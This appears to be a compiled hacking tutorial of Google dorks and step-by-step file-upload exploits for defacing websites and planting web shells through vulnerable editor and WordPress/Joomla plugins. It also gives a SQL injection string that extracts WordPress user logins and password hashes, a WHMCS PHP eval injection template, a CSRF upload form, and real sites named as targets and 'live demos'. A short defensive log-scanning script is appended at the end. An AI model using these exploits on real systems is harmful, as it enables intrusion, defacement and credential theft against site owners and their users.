- /ajaxfilemanager file uploader deface on txt/jpg not sure about html/
- Open Google Search Engine, Type this dork :inurl:/plugins/ajaxfilemanager/
- For Example I got :
- http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/
- or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
- or any site else ...
- Now Put ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url
- for example :
- http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
- http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
- Now find Upload and upload your shell/deface/file. To view your file, find the /uploaded/ directory on the website by using your brain :P Example of uploaded file: http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt
- ------------------
- WordPress File Upload with Asset Manager
- Dork:inurl:Editor/assetmanager/assetmanager.asp
- --------------------
- Hack Blog/WordPress the easy, easy way :D
- Dork: inurl:"fbconnect_action=myhome"
- 2. Now, open any link below.
- 3. After opening the link, just change this part, ?fbconnect_action=myhome&userid=, to this one:
- ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--
- ----------------------
- Hack sites using the RTE webwiz vulnerability
- First search for the dork. The dork for this vulnerability is "inurl:rte/my_documents/my_files"
- The exploit is site.com/rte/RTE_popup_file_atch.asp
- site.com/admin/RTE_popup_file_atch.asp
- for example, I found a site that is vulnerable to RTE. Site: http://www.billkonigsberg.com Vulnerability: http://www.billkonigsberg.com/RTE_popup_file_atch.asp Now just upload the deface page to the site, after loading your page.
- Note: look for another page, because this one is no longer vulnerable
- --------------------------
- EzFilemanager Deface Upload
- The dork for EzFilemanager is "inurl:ezfilemanager/ezfilemanager.php"
- (You can modify this dork to get more results on Google)
- Exploit: http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
- Go to this URL: website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and put ?sa=1&type=file after the URL
- now the URL will be: http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
- Now you see the upload option and you can upload html, pdf, ppt, txt, doc, rtf, xml, xsl, DTD, zip, rar, jpg, png
- ---------------------------
- Title : Wordpress Exploit Easy Comment Upload
- Dork : inurl:easy-comment-uploads/upload-form.php
- POC : /wp-content/plugins/easy-comment-uploads/upload-form.php
- 1. Go to Google, enter the dork into Search and Go.
- Dork : inurl:easy-comment-uploads/upload-form.php
- 2. Choose a target.
- 3. There is a choose file button; press it and upload your file.
- 4. Not all of them support html/php/asp because this bug was fixed on 12/09/2011.
- 5. If you get a target that accepts html uploads, count yourself lucky.
- To see your uploaded file, add /wp-content/uploads/2011/10/nama_file_anda.extension
- ---------------------------------
- JOOMLA COMPONENT COM_SMARTFORMER SHELL UPLOAD VULNERABILITY
- Assalamualaikum, today I want to share another Joomla exploit. With this exploit you can upload a shell. OK, let's start.
- 1. Google dork :
- inurl:"index.php?option=com_smartformer"
- 2. Choose one of the targets and something like the example in the picture below will appear:
- Fill in the details as in the picture.
- After that, SUBMIT.
- Something like the picture below will appear:
- OK, if it appears like this it means your shell is in. But if it does not appear like this, for example it says "File rejected", "file contain virus", etc., it means you cannot upload a shell.
- 3. To see the result:
- http://target.com/components/com_smartformer/files/SHELL.php
- target.com = replace with the URL of the website you found; SHELL.php = replace with the name of your shell.
- note : some websites allow the upload but say not found when you open the shell. That means the website stores the shell in another directory. You have to explore and find it yourself.
- DONE!
- Live Demo :
- http://www.northendthrift.com/index.php?option=com_smartformer&Itemid=3
- Result :
- http://www.northendthrift.com/components/com_smartformer/files/hello.htm
- -------------------------------------------
- WordPress "photocrati-theme" Remote File Upload "RFU"
- As-salam, greetings... OK, today I want to teach a WordPress exploit, very simple: upload a shell and you can hack right away. OK, let's get started... The dork:
- "inurl:wp-content/themes/photocrati-theme/admin" OK, expand the dork yourselves << indon -_- OK, next you will find a website like this http://www.photosbykendel.com/wp-content/themes/photocrati-theme/admin/gallery/gallery-iframe.php?gal_id=65_1&gal_type=1&gal_cap=OFF&gal_page=true&page_template=false&bg=42413F next you only need to replace it with upload_edit.php, for example like this http://www.photosbykendel.com/wp-content/themes/photocrati-theme/admin/gallery/upload_edit.php and the place to upload a shell will be displayed like this
- OK, after that you can upload a shell in the form shell.php.jpg
- Many people ask where to get shell.php.jpg ?? You only need to rename your shell to shell.php.jpg
- Once you have uploaded, press add images
- OK, once the upload is finished your shell will appear here
- http://www.photosbykendel.com/wp-content/themes/photocrati-theme/galleries/post-/full/shell.php.jpg
- example of a shell that I have uploaded
- http://www.photosbykendel.com/wp-content/themes/photocrati-theme/galleries/post-/full/taik.php.jpg
- ------------------------------
- Hack with WHM Submit ticket exploit
- Upload Script
- {php}eval(base64_decode('...'));{/php} <---- copy paste on description,title and also name for the email is your choice if paste doesnt work use fake or your alt email
- Dork
- 1. inurl:whmcs/cart.php?a=
- 2. inurl:billing/cart.php?a=
- intext:Powered by WHMCompleteSolution inurl:submitticket.php
- intext:Powered by WHMCompleteSolution inurl:clients/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:client/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:crm/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:cp/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:manage/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:member/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:members/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:billing/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:billings/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:support/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:help/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:secure/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:store/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:log/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:orders/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:order/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:portal/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:mc/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:office/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:submitticket.php site:com
- intext:Powered by WHMCompleteSolution inurl:submitticket.php site:org
- intext:Powered by WHMCompleteSolution inurl:submitticket.php site:net
- intext:Powered by WHMCompleteSolution inurl:submitticket.php site:info
- intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"
- intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"
- ------------------------------------------------
- Deface a Website with Spaw File Manager
- SPAW FILE MANAGER - FILE UPLOAD VULNERABILITY
- Let's start!!
- 1. Enter one of these dorks in Google search
- = inurl:Spaw2/dialogs/
- = Inurl:spaw2/uploads/files \
- = Index of:/Spaw2/uploads/files
- 2. Choose a website and put the exploit at the end of the URL... and press enter.
- Exploit :/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
- site/anydork/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
- ----------------------------------------
- Exploit WordPress “/easy-comment-uploads/upload-form.php”
- —————————————————————————-
- | Title : WordPress Plugin EasyComment Upload Vulnerability
- | Author: Z190T
- | Vendor: http://wordpress.org/extend/plugins/easy-comment-uploads/
- | Date : 15/06/2011
- | Dork : “/easy-comment-uploads/upload-form.php”
- | Category : PHP [File Upload Vulnerability]
- | Tested on: [Windows XP3, Linux Ubuntu]
- —————————————————————————-
- *_Exploit_*
- # http://[localhost]/[path]/easy-comment-uploads/upload-form.php
- # http://[localhost]/easy-comment-uploads/upload-form.php
- # File Extention [.txt],[.jpg],[gif],[png],[bmp]
- *_Preview_*
- # site/wp-content/uploads/[years]/[month]/[yourshell]
- # ex: site/wp-content/uploads/2011/06/shell.php;.txt
- =========================================================
- Live demo :
- http://www.conversationworks.ca/wp-content/uploads/2011/06/galau.jpg
- http://www.qastairs.com/wp/wp-content/uploads/2011/06/galau.jpg
- http://www.10000mile.com/main/wp-content/uploads/2011/06/galau.jpg
- -----------------------------------------------------------
- "Encodable" ~ another Deface and shell upload Vulnerability
- Title : "Encodable" ~ another File upload Vulnerability
- Google Dork : "intext:File Upload by Encodable"
- Lets Start .. xd
- open google.com and enter this dork : "intext:File Upload by Encodable"
- result comes with 166,000 results but some results are fake ... they may be malware
- so pick real things only; you will see the title "Upload a file" in the search results here :)
- click only the sites which come with the Upload a file title
- after clicking the link you'll get an upload form
- you'll see some options in this form like name, description, email etc ...
- type anything in these boxes but add an email in the email box, don't use your own
- put this one billy@microsoft.com , admin@nasa.gov etc :P
- now choose your file and upload it :)
- after clicking on the upload button a pop up will open ... don't close it, it will close automatically
- after uploading file
- on some sites you'll get your uploaded file link after uploading on the website
- and if you did not find it then try these urls
- /upload/files/
- or /upload/userfiles/
- Live Demo : http://150.101.230.65:8008/cgi-bin/filechucker.plx
- Uploaded page : http://150.101.230.65:8008/upload/files/xd.html
- ---------------------------------------------------------------------------
- Uploading defaces pages JOOMLA
- http://mxdotmy.blogspot.kr/2013/04/cara-deface-dengan-teknik-exploit-joomla.html
- Thanks Indonesia Cyber Army lovaya
- ---------------------------------------------------------------------------
- As-salam everyone, I hope you are all well. It has been a long time since I updated this blog. OK, today I want to teach you how to hack a website with the CSRF method. What is CSRF?? CSRF is cross site scripting, haha, is that right? I don't know. OK, let's start :D dork : inurl:/plugins/simple-forum/
- /resources/jscript/ajaxupload/sf-uploader.php
- put it at the end; for example it will look like this
- www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php
- it will show the text = error
- if it shows access denied then it won't work
- its PoC
- <form enctype="multipart/form-data" action="http://mamaklub.longtail.sk/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post"> <input type="jpg" name="url" value="./" /><br /> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> Save the PoC as .html, then replace the website with the one that shows the error text and put it into the PoC. When you open it an upload form will appear; upload your shell. Your shell will appear here: wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php
- ----------------------
- Wp mini forum defaces and shells uploads
- inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload
- site.com/wp-content/uploads/tdomf/tmp/1/your ip address/shell.php.jpg
- --------------------------------
- Asset Manager :Shell and Files upload Vulnerability
- Google Dork : "inurl:Editor/assetmanager/assetmanager.asp"
- Open Google.com/ncr and enter this dork
- "inurl:Editor/assetmanager/assetmanager.asp"
- Now open any site from the search results
- Upload File:
- and the site url will be like site.com/Editor/assetmanager/assetmanager.asp
- Change The Flash into all Files and now choose your file and upload
- and access your file here site.com/Editor/assets/yourfilehere
- -------------------------
- Xampp/lang.tmp Exploit
- inurl:"xampp/lang.tmp"
- /xampp/lang.tmp change to /xampp/lang.php?MESSAGE HERE
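An added defensive example, not part of the original paste: the uploader endpoints and the double-extension file names (`shell.php.jpg`, `shell.php;.txt`) listed above leave traces in a web server access log, and this script flags them. The function names, the sample log lines and the combined log format are assumptions made for the example; only the path fragments come from the page.

```python
import re
from urllib.parse import unquote, urlsplit

# Uploader endpoints named on this page, as lower-cased path fragments.
UPLOADER_PATHS = (
    "ajaxfilemanager/ajaxfilemanager.php",
    "editor/assetmanager/assetmanager.asp",
    "rte_popup_file_atch.asp",
    "ezfilemanager/ezfilemanager.php",
    "easy-comment-uploads/upload-form.php",
    "photocrati-theme/admin/gallery/upload_edit.php",
    "spaw2/dialogs/dialog.php",
    "ajaxupload/sf-uploader.php",
    "tdomf-upload-inline.php",
)
# Script extension followed by a second one: shell.php.jpg, shell.php;.txt
DOUBLE_EXT = re.compile(r"\.(php\d?|phtml|aspx?|jsp|pl|cgi)[;.][^/]*$", re.I)
# Leading fields of an Apache/nginx combined-format access log line (assumed format).
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def classify(line):
    # Returns a finding dict for a suspicious request, or None.
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    path = unquote(urlsplit(target).path).lower()  # drop query, decode %xx
    if any(frag in path for frag in UPLOADER_PATHS):
        kind = "upload-attempt" if method == "POST" else "uploader-probe"
    elif DOUBLE_EXT.search(path):
        kind = "double-extension-file"
    else:
        return None
    return {"ip": ip, "kind": kind, "path": path, "status": int(status)}

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log: documentation IP ranges, made-up timestamps and sizes.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Apr/2013:10:01:02 +0000] "GET /tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Apr/2013:10:01:09 +0000] "POST /wp-content/plugins/easy-comment-uploads/upload-form.php HTTP/1.1" 200 310',
    '198.51.100.7 - - [12/Apr/2013:10:01:15 +0000] "GET /wp-content/uploads/2011/06/shell.php;.txt HTTP/1.1" 200 88',
    '203.0.113.9 - - [12/Apr/2013:10:02:40 +0000] "GET /wp-content/themes/photocrati-theme/galleries/post-/full/shell.php.jpg HTTP/1.1" 404 0',
    '192.0.2.44 - - [12/Apr/2013:10:03:00 +0000] "GET /wp-content/uploads/2011/06/galau.jpg HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A `double-extension-file` hit answered with status 200 means the file exists on disk and should be treated as a possible web shell until inspected.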